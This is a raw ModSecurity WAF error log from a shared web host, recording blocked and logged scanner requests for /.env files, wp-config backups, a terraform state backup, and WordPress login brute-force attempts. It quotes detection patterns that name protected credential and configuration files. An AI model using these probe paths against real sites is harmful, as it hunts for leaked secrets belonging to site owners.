[Tue May 26 14:50:07.211201 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.5:5138] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.txt"] [unique_id "ahVlx7EQDDtxJNiDrdT1TwAAAPM"]
[Tue May 26 14:50:07.211310 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:32178] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stg/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1TgAAAPU"]
[Tue May 26 14:50:07.225736 2026] [security2:error] [pid 648203:tid 648394] [client 46.203.157.253:39403] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1JwAAAMI"], referer: https://anujtradingco.com
[Tue May 26 14:50:07.234237 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:32158] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1SAAAAOY"]
[Tue May 26 14:50:07.240490 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1TAAAAIU"]
[Tue May 26 14:50:07.245297 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:32084] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1SgAAAKA"]
[Tue May 26 14:50:07.261795 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1TQAAAL4"]
[Tue May 26 14:50:07.273139 2026] [security2:error] [pid 648203:tid 648299] [remote 94.76.235.103:45680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1QgAA6F8"]
[Tue May 26 14:50:07.287692 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1UQAAALA"]
[Tue May 26 14:50:07.292579 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VAAAAJc"]
[Tue May 26 14:50:07.335286 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VQAAAM4"]
[Tue May 26 14:50:07.362774 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VgAAANA"]
[Tue May 26 14:50:07.459556 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1WQAAAMk"]
[Tue May 26 14:50:07.465894 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:32176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1WgAAAKQ"]
[Tue May 26 14:50:07.515453 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:32170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stripe/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZQAAALI"]
[Tue May 26 14:50:07.517052 2026] [security2:error] [pid 648203:tid 648402] [client 209.50.181.226:11175] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0-wAAAMo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:07.534020 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1XQAAAMw"]
[Tue May 26 14:50:07.544093 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1YAAAAN0"]
[Tue May 26 14:50:07.566286 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZAAAANs"]
[Tue May 26 14:50:07.576170 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:32214] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZgAAAKo"]
[Tue May 26 14:50:07.594431 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1aQAAAMU"]
[Tue May 26 14:50:07.626880 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1bwAAAKg"]
[Tue May 26 14:50:07.668536 2026] [security2:error] [pid 648203:tid 648416] [client 193.37.33.156:60225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1YQAAANg"]
[Tue May 26 14:50:07.692128 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cgAAALc"]
[Tue May 26 14:50:07.722745 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cAAAAJ4"]
[Tue May 26 14:50:07.724496 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:32214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1dAAAAJ0"]
[Tue May 26 14:50:07.740845 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cQAAAJE"]
[Tue May 26 14:50:07.760981 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cwAAAM0"]
[Tue May 26 14:50:07.778470 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/user/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1ewAAAJo"]
[Tue May 26 14:50:07.797260 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:31998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlx7EQDDtxJNiDrdT1fQAAAJs"]
[Tue May 26 14:50:07.804186 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1dwAAAPo"]
[Tue May 26 14:50:07.827286 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1egAAAOM"]
[Tue May 26 14:50:07.859074 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1fwAAAKk"]
[Tue May 26 14:50:07.865326 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ggAAAPI"]
[Tue May 26 14:50:07.886079 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:32110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v3/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1iAAAALQ"]
[Tue May 26 14:50:07.918386 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1hQAAAQE"]
[Tue May 26 14:50:07.948598 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1iQAAAIk"]
[Tue May 26 14:50:07.971398 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1jwAAAPU"]
[Tue May 26 14:50:07.981925 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1kgAAAKA"]
[Tue May 26 14:50:08.025574 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:32176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v1/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1nwAAAKU"]
[Tue May 26 14:50:08.045819 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1mQAAAOc"]
[Tue May 26 14:50:08.055337 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v2/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1oAAAALI"]
[Tue May 26 14:50:08.072570 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ngAAAPA"]
[Tue May 26 14:50:08.161076 2026] [security2:error] [pid 648203:tid 648455] [client 45.148.10.95:32198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1pAAAAP8"]
[Tue May 26 14:50:08.161998 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1owAAAMs"]
[Tue May 26 14:50:08.190772 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:31870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1pQAAALk"]
[Tue May 26 14:50:08.205820 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1qwAAAMg"]
[Tue May 26 14:50:08.241500 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1rwAAALw"]
[Tue May 26 14:50:08.298288 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1sAAAAI8"]
[Tue May 26 14:50:08.313210 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1swAAAKg"]
[Tue May 26 14:50:08.331586 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1tgAAAI4"]
[Tue May 26 14:50:08.332799 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1uwAAAJ4"]
[Tue May 26 14:50:08.341774 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1uQAAAPg"]
[Tue May 26 14:50:08.378445 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32214] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ugAAALc"]
[Tue May 26 14:50:08.421999 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1vgAAAPw"]
[Tue May 26 14:50:08.457055 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1xAAAAOw"]
[Tue May 26 14:50:08.463250 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1xgAAAKM"]
[Tue May 26 14:50:08.472147 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:32118] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1yAAAAQA"]
[Tue May 26 14:50:08.518876 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ygAAAJU"]
[Tue May 26 14:50:08.537446 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:32062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ywAAANU"]
[Tue May 26 14:50:08.570228 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:32148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/html/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT10wAAAKw"]
